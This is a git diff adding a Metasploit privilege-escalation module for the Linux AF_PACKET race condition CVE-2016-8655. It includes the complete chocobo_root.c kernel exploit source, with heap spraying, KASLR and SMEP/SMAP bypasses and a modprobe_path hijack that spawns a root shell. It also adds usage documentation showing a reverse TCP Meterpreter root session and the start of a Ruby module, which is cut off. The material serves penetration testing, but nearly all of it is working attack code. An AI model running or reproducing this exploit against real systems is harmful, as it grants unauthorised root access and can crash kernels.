diff --git a/data/exploits/CVE-2016-8655/chocobo_root b/data/exploits/CVE-2016-8655/chocobo_root new file mode 100644 index 000000000000..209580718168 Binary files /dev/null and b/data/exploits/CVE-2016-8655/chocobo_root differ diff --git a/data/exploits/CVE-2016-8655/chocobo_root.c b/data/exploits/CVE-2016-8655/chocobo_root.c new file mode 100644 index 000000000000..ed57dfa5329e --- /dev/null +++ b/data/exploits/CVE-2016-8655/chocobo_root.c @@ -0,0 +1,945 @@ +/* +chocobo_root.c +linux AF_PACKET race condition exploit for CVE-2016-8655. +Includes KASLR and SMEP/SMAP bypasses. +For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74. +All kernel offsets have been tested on Ubuntu / Linux Mint. + +vroom vroom +*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= +user@ubuntu:~$ uname -a +Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux +user@ubuntu:~$ id +uid=1000(user) gid=1000(user) groups=1000(user) +user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread +user@ubuntu:~$ ./chocobo_root +linux AF_PACKET race condition exploit by rebel +kernel version: 4.4.0-51-generic #72 +proc_dostring = 0xffffffff81088090 +modprobe_path = 0xffffffff81e48f80 +register_sysctl_table = 0xffffffff812879a0 +set_memory_rw = 0xffffffff8106f320 +exploit starting +making vsyscall page writable.. + +new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000 +sockets allocated +removing barrier and spraying.. +version switcher stopping, x = -1 (y = 174222, last val = 2) +current packet version = 0 +pbd->hdr.bh1.offset_to_first_pkt = 48 +*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=* +please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. +closing socket and verifying....... +vsyscall page altered! + + +stage 1 completed +registering new sysctl.. + +new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 +sockets allocated +removing barrier and spraying.. +version switcher stopping, x = -1 (y = 30773, last val = 0) +current packet version = 2 +pbd->hdr.bh1.offset_to_first_pkt = 48 +race not won + +retrying stage.. +new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 +sockets allocated +removing barrier and spraying.. +version switcher stopping, x = -1 (y = 133577, last val = 2) +current packet version = 0 +pbd->hdr.bh1.offset_to_first_pkt = 48 +*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=* +please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. +closing socket and verifying....... +sysctl added! + +stage 2 completed +binary executed by kernel, launching rootshell +root@ubuntu:~# id +uid=0(root) gid=0(root) groups=0(root),1000(user) + +*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= + +Shoutouts to: +jsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI) +mcdelivery for delivering hotcakes and coffee + +11/2016 +by rebel +--- +Updated by +- check number of CPU cores +- KASLR bypasses +- additional kernel targets +https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655 +*/ + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#define DEBUG + +#ifdef DEBUG +# define dprintf printf +#else +# define dprintf +#endif + +#define ENABLE_KASLR_BYPASS 1 + +// Will be overwritten if ENABLE_KASLR_BYPASS +unsigned long KERNEL_BASE = 0xffffffff81000000ul; + +// Will be overwritten by detect_versions() +int kernel = -1; + +// New sysctl path +const char *SYSCTL_NAME = "hack"; +const char *SYSCTL_PATH = "/proc/sys/hack"; + +volatile int barrier = 1; +volatile int vers_switcher_done = 0; + +struct kernel_info { + char *kernel_version; + unsigned long proc_dostring; + unsigned long modprobe_path; + unsigned long register_sysctl_table; + unsigned long set_memory_rw; +}; + +struct kernel_info kernels[] = { + { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 }, + { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 }, + { "4.4.0-24-generic #43~14.04.1-Ubuntu", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 }, + { "4.4.0-28-generic #47~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273b70, 0x06b880 }, + { "4.4.0-31-generic #50~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c20, 0x06b880 }, + { "4.4.0-34-generic #53~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c40, 0x06b880 }, + { "4.4.0-36-generic #55~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c60, 0x06b890 }, + { "4.4.0-38-generic #57~14.04.1-Ubuntu", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 }, + { "4.4.0-42-generic #62~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274300, 0x06b880 }, + { "4.4.0-45-generic #66~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274340, 0x06b880 }, + //{"4.4.0-46-generic #67~14.04.1-Ubuntu",0x0842f0,0xe4b100,0x274580,0x06b880}, + { "4.4.0-47-generic #68~14.04.1-Ubuntu", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 }, + //{"4.4.0-49-generic #70~14.04.1-Ubuntu",0x084350,0xe4b100,0x274b10,0x06b880}, + { "4.4.0-51-generic #72~14.04.1-Ubuntu", 0x084350, 0xe4b100, 0x274750, 0x06b880 }, + + { "4.4.0-21-generic #37-Ubuntu", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 }, + { "4.4.0-22-generic #40-Ubuntu", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 }, + { "4.4.0-24-generic #43-Ubuntu", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 }, + { "4.4.0-28-generic #47-Ubuntu", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 }, + { "4.4.0-31-generic #50-Ubuntu", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 }, + { "4.4.0-34-generic #53-Ubuntu", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 }, + { "4.4.0-36-generic #55-Ubuntu", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 }, + { "4.4.0-38-generic #57-Ubuntu", 0x087f70, 0xe48f80, 0x287470, 0x06f360 }, + { "4.4.0-42-generic #62-Ubuntu", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 }, + { "4.4.0-43-generic #63-Ubuntu", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 }, + { "4.4.0-45-generic #66-Ubuntu", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 }, + //{"4.4.0-46-generic #67-Ubuntu",0x088040,0xe48f80,0x287800,0x06f320}, + { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 }, + //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320}, + { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320}, +}; + +#define VSYSCALL 0xffffffffff600000 +#define PROC_DOSTRING (KERNEL_BASE + kernels[kernel].proc_dostring) +#define MODPROBE_PATH (KERNEL_BASE + kernels[kernel].modprobe_path) +#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table) +#define SET_MEMORY_RW (KERNEL_BASE + kernels[kernel].set_memory_rw) + +#define KMALLOC_PAD 64 + +int pad_fds[KMALLOC_PAD]; + +// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * + +struct ctl_table { + const char *procname; + void *data; + int maxlen; + unsigned short mode; + struct ctl_table *child; + void *proc_handler; + void *poll; + void *extra1; + void *extra2; +}; + +#define CONF_RING_FRAMES 1 + +struct tpacket_req3 tp; +int sfd; +int mapped = 0; + +struct timer_list { + void *next; + void *prev; + unsigned long expires; + void (*function)(unsigned long); + unsigned long data; + unsigned int flags; + int slack; +}; + +// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * * + +void *setsockopt_thread(void *arg) +{ + while (barrier) {} + setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp)); + + return NULL; +} + +void *vers_switcher(void *arg) +{ + int val,x,y; + + while (barrier) {} + + while (1) { + val = TPACKET_V1; + x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val)); + + y++; + + if (x != 0) break; + + val = TPACKET_V3; + x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val)); + + if (x != 0) break; + + y++; + } + + dprintf("[.] version switcher stopping, x = %d (y = %d, last val = %d)\n",x,y,val); + vers_switcher_done = 1; + + return NULL; +} + +// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * * + +#define BUFSIZE 1408 +char exploitbuf[BUFSIZE]; + +void kmalloc(void) +{ + while(1) + syscall(__NR_add_key, "user", "wtf", exploitbuf, BUFSIZE - 24, -2); +} + +void pad_kmalloc(void) +{ + int x; + for (x = 0; x < KMALLOC_PAD; x++) + if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) { + dprintf("[-] pad_kmalloc() socket error\n"); + exit(EXIT_FAILURE); + } +} + +// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * + +int try_exploit(unsigned long func, unsigned long arg, void *verification_func) +{ + pthread_t setsockopt_thread_thread,a; + int val; + socklen_t l; + struct timer_list *timer; + int fd; + struct tpacket_block_desc *pbd; + int off; + sigset_t set; + + sigemptyset(&set); + + sigaddset(&set, SIGSEGV); + + if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) { + dprintf("[-] couldn't set sigmask\n"); + exit(1); + } + + dprintf("[.] new exploit attempt starting, jumping to %p, arg=%p\n", (void *)func, (void *)arg); + + pad_kmalloc(); + + fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); + + if (fd == -1) { + dprintf("[-] target socket error\n"); + exit(1); + } + + pad_kmalloc(); + + dprintf("[.] done, sockets allocated\n"); + + val = TPACKET_V3; + + setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val)); + + tp.tp_block_size = CONF_RING_FRAMES * getpagesize(); + tp.tp_block_nr = 1; + tp.tp_frame_size = getpagesize(); + tp.tp_frame_nr = CONF_RING_FRAMES; + + // try to set the timeout to 10 seconds + // the default timeout might still be used though depending on when the race was won + tp.tp_retire_blk_tov = 10000; + + sfd = fd; + + if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) { + dprintf("[-] Error creating thread\n"); + return 1; + } + + pthread_create(&a, NULL, vers_switcher, (void *)NULL); + + usleep(200000); + + dprintf("[.] removing barrier and spraying...\n"); + + memset(exploitbuf, '\x00', BUFSIZE); + + timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8); + timer->next = 0; + timer->prev = 0; + + timer->expires = 4294943360; + timer->function = (void *)func; + timer->data = arg; + timer->flags = 1; + timer->slack = -1; + + barrier = 0; + + usleep(100000); + + while (!vers_switcher_done) usleep(100000); + + l = sizeof(val); + getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l); + + dprintf("[.] current packet version = %d\n",val); + + pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0); + + if (pbd == MAP_FAILED) { + dprintf("[-] could not map pbd\n"); + exit(1); + } else { + off = pbd->hdr.bh1.offset_to_first_pkt; + dprintf("[.] pbd->hdr.bh1.offset_to_first_pkt = %d\n", off); + } + + + if (val == TPACKET_V1 && off != 0) { + dprintf("*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\n"); + } else { + dprintf("[-] race not won\n"); + exit(2); + } + + munmap(pbd, tp.tp_block_size * tp.tp_block_nr); + + pthread_create(&a, NULL, verification_func, (void *)NULL); + + dprintf("\n"); + dprintf("[!] please wait up to a few minutes for timer to be executed.\n"); + dprintf("[!] if you ctrl-c now the kernel will hang. so don't do that.\n"); + dprintf("\n"); + + sleep(1); + dprintf("[.] closing socket and verifying...\n"); + + close(sfd); + + kmalloc(); + + dprintf("[.] all messages sent\n"); + + sleep(31337); + exit(1); +} + +int verification_result = 0; + +void catch_sigsegv(int sig) +{ + verification_result = 0; + pthread_exit((void *)1); +} + +void *modify_vsyscall(void *arg) +{ + unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850); + unsigned long x = (unsigned long)arg; + + sigset_t set; + sigemptyset(&set); + sigaddset(&set, SIGSEGV); + + if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) { + dprintf("[-] couldn't set sigmask\n"); + exit(EXIT_FAILURE); + } + + signal(SIGSEGV, catch_sigsegv); + + *vsyscall = 0xdeadbeef+x; + + if (*vsyscall == 0xdeadbeef+x) { + dprintf("[~] vsyscall page altered!\n"); + verification_result = 1; + pthread_exit(0); + } + + return NULL; +} + +void verify_stage1(void) +{ + pthread_t v_thread; + + sleep(5); + + int x; + for(x = 0; x < 300; x++) { + + pthread_create(&v_thread, NULL, modify_vsyscall, 0); + + pthread_join(v_thread, NULL); + + if(verification_result == 1) { + exit(0); + } + + write(2,".",1); + sleep(1); + } + + dprintf("[-] could not modify vsyscall\n"); + exit(EXIT_FAILURE); +} + +void verify_stage2(void) +{ + struct stat b; + + sleep(5); + + int x; + for(x = 0; x < 300; x++) { + + if (stat(SYSCTL_PATH, &b) == 0) { + dprintf("[~] sysctl added!\n"); + exit(0); + } + + write(2,".",1); + sleep(1); + } + + dprintf("[-] could not add sysctl\n"); + exit(EXIT_FAILURE); +} + +void exploit(unsigned long func, unsigned long arg, void *verification_func) +{ + int status; + int pid; + +retry: + + pid = fork(); + + if (pid == 0) { + try_exploit(func, arg, verification_func); + exit(1); + } + + wait(&status); + + dprintf("\n"); + + if (WEXITSTATUS(status) == 2) { + dprintf("[.] retrying stage...\n"); + kill(pid, 9); + sleep(2); + goto retry; + } + + if (WEXITSTATUS(status) != 0) { + dprintf("[-] something bad happened, aborting exploit attempt\n"); + exit(EXIT_FAILURE); + } + + kill(pid, 9); +} + + +void wrapper(void) +{ + struct ctl_table *c; + + dprintf("[.] making vsyscall page writable...\n\n"); + + exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1); + + dprintf("[~] done, stage 1 completed\n"); + + sleep(5); + + dprintf("[.] registering new sysctl...\n\n"); + + c = (struct ctl_table *)(VSYSCALL+0x850); + + memset((char *)(VSYSCALL+0x850), '\x00', 1952); + + strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME); + memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4); + c->procname = (char *)(VSYSCALL+0xf00); + c->mode = 0666; + c->proc_handler = (void *)(PROC_DOSTRING); + c->data = (void *)(MODPROBE_PATH); + c->maxlen = 256; + c->extra1 = (void *)(VSYSCALL+0xe00); + c->extra2 = (void *)(VSYSCALL+0xd00); + + exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2); + + dprintf("[~] done, stage 2 completed\n"); +} + +// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * + +void check_procs() { + int min_procs = 2; + + int nprocs = 0; + nprocs = get_nprocs_conf(); + + if (nprocs < min_procs) { + dprintf("[-] system has less than %d processor cores\n", min_procs); + exit(EXIT_FAILURE); + } + + dprintf("[.] system has %d processor cores\n", nprocs); +} + +struct utsname get_kernel_version() { + struct utsname u; + int rv = uname(&u); + if (rv != 0) { + dprintf("[-] uname())\n"); + exit(EXIT_FAILURE); + } + return u; +} + +#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0])) + +void detect_versions() { + struct utsname u; + char kernel_version[512]; + + u = get_kernel_version(); + + if (strstr(u.machine, "64") == NULL) { + dprintf("[-] system is not using a 64-bit kernel\n"); + exit(EXIT_FAILURE); + } + + if (strstr(u.version, "-Ubuntu") == NULL) { + dprintf("[-] system is not using an Ubuntu kernel\n"); + exit(EXIT_FAILURE); + } + + char *u_ver = strtok(u.version, " "); + snprintf(kernel_version, 512, "%s %s", u.release, u_ver); + + int i; + for (i = 0; i < ARRAY_SIZE(kernels); i++) { + if (strcmp(kernel_version, kernels[i].kernel_version) == 0) { + dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version); + kernel = i; + return; + } + } + + dprintf("[-] kernel version not recognized\n"); + exit(EXIT_FAILURE); +} + +// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * * + +#define SYSLOG_ACTION_READ_ALL 3 +#define SYSLOG_ACTION_SIZE_BUFFER 10 + +bool mmap_syslog(char** buffer, int* size) { + *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0); + if (*size == -1) { + dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n"); + return false; + } + + *size = (*size / getpagesize() + 1) * getpagesize(); + *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + + *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size); + if (*size == -1) { + dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n"); + return false; + } + + return true; +} + +unsigned long get_kernel_addr_trusty(char* buffer, int size) { + const char* needle1 = "Freeing unused"; + char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1)); + if (substr == NULL) return 0; + + int start = 0; + int end = 0; + for (end = start; substr[end] != '-'; end++); + + const char* needle2 = "ffffff"; + substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2)); + if (substr == NULL) return 0; + + char* endptr = &substr[16]; + unsigned long r = strtoul(&substr[0], &endptr, 16); + + r &= 0xffffffffff000000ul; + + return r; +} + +unsigned long get_kernel_addr_xenial(char* buffer, int size) { + const char* needle1 = "Freeing unused"; + char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1)); + if (substr == NULL) { + return 0; + } + + int start = 0; + int end = 0; + for (start = 0; substr[start] != '-'; start++); + for (end = start; substr[end] != '\n'; end++); + + const char* needle2 = "ffffff"; + substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2)); + if (substr == NULL) { + return 0; + } + + char* endptr = &substr[16]; + unsigned long r = strtoul(&substr[0], &endptr, 16); + + r &= 0xfffffffffff00000ul; + r -= 0x1000000ul; + + return r; +} + +unsigned long get_kernel_addr_syslog() { + unsigned long addr = 0; + char* syslog; + int size; + + dprintf("[.] trying syslog...\n"); + + if (!mmap_syslog(&syslog, &size)) + return 0; + + if (strstr(kernels[kernel].kernel_version, "14.04.1") != NULL) + addr = get_kernel_addr_trusty(syslog, size); + else + addr = get_kernel_addr_xenial(syslog, size); + + if (!addr) + dprintf("[-] kernel base not found in syslog\n"); + + return addr; +} + +// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * * + +unsigned long get_kernel_addr_kallsyms() { + FILE *f; + unsigned long addr = 0; + char dummy; + char sname[256]; + char* name = "startup_64"; + char* path = "/proc/kallsyms"; + + dprintf("[.] trying %s...\n", path); + f = fopen(path, "r"); + if (f == NULL) { + dprintf("[-] open/read(%s)\n", path); + return 0; + } + + int ret = 0; + while (ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fclose(f); + return addr; + } + } + + fclose(f); + dprintf("[-] kernel base not found in %s\n", path); + return 0; +} + +// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * * + +unsigned long get_kernel_addr_sysmap() { + FILE *f; + unsigned long addr = 0; + char path[512] = "/boot/System.map-"; + char version[32]; + + struct utsname u; + u = get_kernel_version(); + strcat(path, u.release); + dprintf("[.] trying %s...\n", path); + f = fopen(path, "r"); + if (f == NULL) { + dprintf("[-] open/read(%s)\n", path); + return 0; + } + + char dummy; + char sname[256]; + char* name = "startup_64"; + int ret = 0; + while (ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fclose(f); + return addr; + } + } + + fclose(f); + dprintf("[-] kernel base not found in %s\n", path); + return 0; +} + +// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * * + +unsigned long get_kernel_addr_mincore() { + unsigned char buf[getpagesize()/sizeof(unsigned char)]; + unsigned long iterations = 20000000; + unsigned long addr = 0; + + dprintf("[.] trying mincore info leak...\n"); + /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */ + if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, + MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) { + dprintf("[-] mmap()\n"); + return 0; + } + + int i; + for (i = 0; i <= iterations; i++) { + /* Touch a mishandle with this type mapping */ + if (mincore((void*)0x86000000, 0x1000000, buf)) { + dprintf("[-] mincore()\n"); + return 0; + } + + int n; + for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) { + addr = *(unsigned long*)(&buf[n]); + /* Kernel address space */ + if (addr > 0xffffffff00000000) { + addr &= 0xffffffffff000000ul; + if (munmap((void*)0x66000000, 0x20000000000)) + dprintf("[-] munmap()\n"); + return addr; + } + } + } + + if (munmap((void*)0x66000000, 0x20000000000)) + dprintf("[-] munmap()\n"); + + dprintf("[-] kernel base not found in mincore info leak\n"); + return 0; +} + +// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * * + +unsigned long get_kernel_addr() { + unsigned long addr = 0; + + addr = get_kernel_addr_kallsyms(); + if (addr) return addr; + + addr = get_kernel_addr_sysmap(); + if (addr) return addr; + + addr = get_kernel_addr_syslog(); + if (addr) return addr; + + addr = get_kernel_addr_mincore(); + if (addr) return addr; + + dprintf("[-] KASLR bypass failed\n"); + exit(EXIT_FAILURE); + + return 0; +} + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * + +void launch_rootshell(void) +{ + int fd; + char buf[256]; + struct stat s; + + fd = open(SYSCTL_PATH, O_WRONLY); + + if(fd == -1) { + dprintf("[-] could not open %s\n", SYSCTL_PATH); + exit(EXIT_FAILURE); + } + + memset(buf, '\x00', 256); + + readlink("/proc/self/exe", (char *)&buf, 256); + + write(fd, buf, strlen(buf)+1); + + socket(AF_INET, SOCK_STREAM, 132); + + if (stat(buf,&s) == 0 && s.st_uid == 0) { + dprintf("[+] binary executed by kernel, launching rootshell\n"); + lseek(fd, 0, SEEK_SET); + write(fd, "/sbin/modprobe", 15); + close(fd); + execl(buf, buf, NULL); + } else { + dprintf("[-] could not create rootshell\n"); + exit(EXIT_FAILURE); + } +} + +void setup_sandbox() { + if (unshare(CLONE_NEWUSER) != 0) { + dprintf("[-] unshare(CLONE_NEWUSER)\n"); + exit(EXIT_FAILURE); + } + + if (unshare(CLONE_NEWNET) != 0) { + dprintf("[-] unshare(CLONE_NEWNET)\n"); + exit(EXIT_FAILURE); + } +} + +int main(int argc, char **argv) +{ + int status, pid; + struct utsname u; + char buf[512], *f; + + if (getuid() == 0 && geteuid() == 0) { + chown("/proc/self/exe", 0, 0); + chmod("/proc/self/exe", 06755); + exit(0); + } + + if (getuid() != 0 && geteuid() == 0) { + setresuid(0, 0, 0); + setresgid(0, 0, 0); + execl("/bin/bash", "bash", "-p", NULL); + exit(0); + } + + dprintf("linux AF_PACKET race condition exploit by rebel\n"); + + dprintf("[.] starting\n"); + + dprintf("[.] checking hardware\n"); + check_procs(); + dprintf("[~] done, hardware looks good\n"); + + dprintf("[.] checking kernel version\n"); + detect_versions(); + dprintf("[~] done, version looks good\n"); + +#if ENABLE_KASLR_BYPASS + dprintf("[.] KASLR bypass enabled, getting kernel base address\n"); + KERNEL_BASE = get_kernel_addr(); + dprintf("[~] done, kernel text: %lx\n", KERNEL_BASE); +#endif + + dprintf("[.] proc_dostring: %lx\n", PROC_DOSTRING); + dprintf("[.] modprobe_path: %lx\n", MODPROBE_PATH); + dprintf("[.] register_sysctl_table: %lx\n", REGISTER_SYSCTL_TABLE); + dprintf("[.] set_memory_rw: %lx\n", SET_MEMORY_RW); + + pid = fork(); + if (pid == 0) { + dprintf("[.] setting up namespace sandbox\n"); + setup_sandbox(); + dprintf("[~] done, namespace sandbox set up\n"); + wrapper(); + exit(0); + } + + waitpid(pid, &status, 0); + + launch_rootshell(); + return 0; +} diff --git a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md new file mode 100644 index 000000000000..7549e64a9520 --- /dev/null +++ b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md @@ -0,0 +1,97 @@ +## Description + + This module exploits a race condition and use-after-free in the + `packet_set_ring` function in `net/packet/af_packet.c` (`AF_PACKET`) in + the Linux kernel to execute code as `root` (CVE-2016-8655). + + The bug was initially introduced in 2011 and patched in 2016 in version + 4.4.0-53.74, potentially affecting a large number of kernels; however + this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels + 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as + Linux Mint. + + The target system must have unprivileged user namespaces enabled and + two or more CPU cores. + + Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation + may crash the kernel. + + +## Vulnerable Application + + This module has been tested successfully on: + + * Linux Mint 17.3 (x86_64) + * Linux Mint 18 (x86_64) + * Ubuntu 16.04.2 (x86_64) + + With kernel versions: + + * 4.4.0-45-generic + * 4.4.0-51-generic + + +## Verification Steps + + 1. Start `msfconsole` + 2. Get a session + 3. `use exploit/linux/local/af_packet_chocobo_root_priv_esc` + 4. `set SESSION [SESSION]` + 5. `check` + 6. `run` + 7. You should get a new *root* session + + +## Options + + **SESSION** + + Which session to use, which can be viewed with `sessions` + + **WritableDir** + + A writable directory file system path. (default: `/tmp`) + + **TIMEOUT** + + Race timeout (seconds). (default: `600`) + + **COMPILE** + + Options: `Auto` `True` `False` (default: `Auto`) + + Whether the exploit should be live compiled with `gcc` on the target system, + or uploaded as a pre-compiled binary. + + `Auto` will first determine if `gcc` is installed to compile live on the system, + and fall back to uploading a pre-compiled binary. + + +## Scenarios + + ``` + msf5 > use exploit/linux/local/af_packet_chocobo_root_priv_esc + msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1 + session => 1 + msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run + [*] Started reverse TCP handler on 172.16.191.188:4444 + [*] Writing '/tmp/.iDLrwN3S4.c' (24885 bytes) ... + [*] Writing '/tmp/.rMIvkKT' (207 bytes) ... + [*] Launching exploit (Timeout: 600)... + [*] Sending stage (853256 bytes) to 172.16.191.209 + [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.209:38530) at 2018-05-07 03:07:21 -0400 + [+] Deleted /tmp/.iDLrwN3S4.c + [+] Deleted /tmp/.iDLrwN3S4 + [+] Deleted /tmp/.rMIvkKT + + meterpreter > getuid + Server username: uid=0, gid=0, euid=0, egid=0 + meterpreter > sysinfo + Computer : 172.16.191.209 + OS : Ubuntu 16.04 (Linux 4.4.0-51-generic) + Architecture : x64 + BuildTuple : i486-linux-musl + Meterpreter : x86/linux + meterpreter > + ``` + diff --git a/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb b/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb new file mode 100644 index 000000000000..41a82628ea50 --- /dev/null +++ b/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb @@ -0,0 +1,200 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AF_PACKET chocobo_root Privilege Escalation', + 'Description' => %q{ + This module exploits a race condition and use-after-free in the + packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in + the Linux kernel to execute code as root (CVE-2016-8655). + + The bug was initially introduced in 2011 and patched in 2016 in version + 4.4.0-53.74, potentially affecting a large number of kernels; however + this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels + 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as + Linux Mint. + + The target system must have unprivileged user namespaces enabled and + two or more CPU cores. + + Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation + may crash the kernel. + + This module has been tested successfully on Linux Mint 17.3 (x86_64); + Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel + versions 4.4.0-45-generic and 4.4.0-51-generic. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rebel', # Discovery and chocobo_root.c exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Aug 12 2016', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'AKA', 'chocobo_root.c' ], + [ 'EDB', '40871' ], + [ 'CVE', '2016-8655' ], + [ 'BID', 